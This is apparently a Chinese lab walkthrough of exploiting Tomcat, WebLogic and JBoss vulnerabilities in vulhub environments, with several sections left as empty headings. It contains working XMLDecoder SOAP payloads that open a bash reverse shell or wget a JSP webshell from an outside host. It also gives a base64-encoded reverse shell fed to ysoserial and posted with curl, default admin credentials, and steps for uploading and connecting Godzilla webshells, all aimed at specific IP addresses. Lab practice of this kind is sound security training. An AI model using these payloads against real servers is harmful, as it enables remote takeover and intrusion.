Tomcat中间件漏洞练习
CVE-2017-12615
1.环境搭建(vul-hub)
2.操作步骤
3.然后我们使用哥斯拉生成一个木马
4.然后我们刷新首页打开burpsuite拦击抓包,然后按照图片中提示修改包。
5。然后我们去访问这个文件,并使用哥斯拉连接
后台弱口令部署war包
1.环境搭建(vulhub)
2.操作步骤
1.来打靶场后我们访问:http://47.105.65.103:8080/manager/html,然后按照图片中修改
2.将之前哥斯拉生成的木马,压缩然后修改文件名为:shell.war
3.登录成功后然后上传文件shell.war
4.然后我们尝试去访问一下这个文件路径如图所示。成功访问到。
5.然后我们尝试使用哥斯拉连接
CVE-2020-1938
1.环境搭建
cd vulhub-master/tomcat/CVE-2020-1938
2.操作步骤
1.我们需要准备一个脚本
2.接下来我们打开kali,然后在工具包里面的打开终端然后输入:python2 duqu.py -p 8009 -f /WEB-INF/web.xml 47.105.65.103
就可以了
WebLogic
后台弱口令GetShell
1.环境搭建
2.操作步骤
1.来到靶场后首页便是这样。
2.然后我们输入如图所示拼接路径,然后输入默认账户密码:weblogic/Oracle@123
3.然后我们如图所示操作,上传之前的shell.war文件,然后一直下一步就可以啦。
4.然后去访问我们上传的文件
5.尝试用哥斯拉连接
CVE-2017-3506
1.环境搭建
2.操作步骤
1访问:http://124.221.58.83:7001/wls-wsat/CoordinatorPortType 验证是否存在wls-wsat组件
2.然后在这个界面抓包,并输入:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/124.221.58.83/6666 0>&1</string>
</void>
</array>
<void method="start"/></object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
3.成功反弹到shell
CVE-2019-2725
1.环境搭建
2.操作步骤
1.输入:http://1.15.136.212:7001/_async/AsyncResponseService验证是否存在漏洞
2.在当前页面抓包,然后修改
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://114.132.92.17/2.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/678.jsp
</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header><soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
3.然后用哥斯拉连接
CVE-2018-2628
1.环境搭建
2.操作步骤
1.然后我们用工具尝试去扫描,看到扫描出来漏洞
2.尝试利用漏洞,成功执行命令。
CVE-2018-2894
1.环境搭建
2.操作步骤
1.首先获得随机密码,输入:docker-compose logs | grep password
2.然后我们登录后台,后台地址:Oracle WebLogic Server Administration Console
3.然后来到:121.40.229.129:7001/ws_utc/config.do,然后按照图片中操作。
然后修改文件保存路径:
4.然后在在当前界面按f12检查源代码,查看id
5.连接哥斯拉,地址为:121.40.229.129:7001/ws_utc/css/config/keystore/1726815031601_shell.jsp
6.然后我们用哥斯拉连接一下即可
CVE-2020-14882
1.环境搭建
2.操作步骤
Jboss
CVE-2015-7501
1.环境搭建
2.操作步骤
2.下载 ysoserial 工具进行漏洞利用
https://github.com/frohoff/ysoserial
3.将反弹shell进行base64编码
bash -i >& /dev/tcp/114.132.92.17/6666 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTMyLjkyLjE3LzY2NjYgMD4mMSA=
4.然后执行:java -jar ysoserial-all.jar CommonsCollections5 "bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDUuNjUuMTAzLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i} ">exp.ser
5.接着执行:curl http://47.105.65.103:8080//invoker/JMXInvokerServlet --data-binary @exp.ser
6.我们提前监听的机器成功监听到。
CVE-2017-7504
1.环境搭建
2.操作步骤
2.打开cmd输入:python3 jexboss.py -u http://121.40.229.129:8080,成功反弹到shell
CVE-2017-12149
1.环境搭建
2.操作步骤
2.我们使用工具去检测一下,成功执行
Administration Console弱口令
1.环境搭建
2.操作步骤
1.首先访问后台http://121.40.229.129:8080/admin-console/login.seam,然后使用默认密码登录:admin vulhub
2.然后我们上传之前准备好的shell.war
3.成功上传。
4.然后我们用哥斯拉连接,成功连接。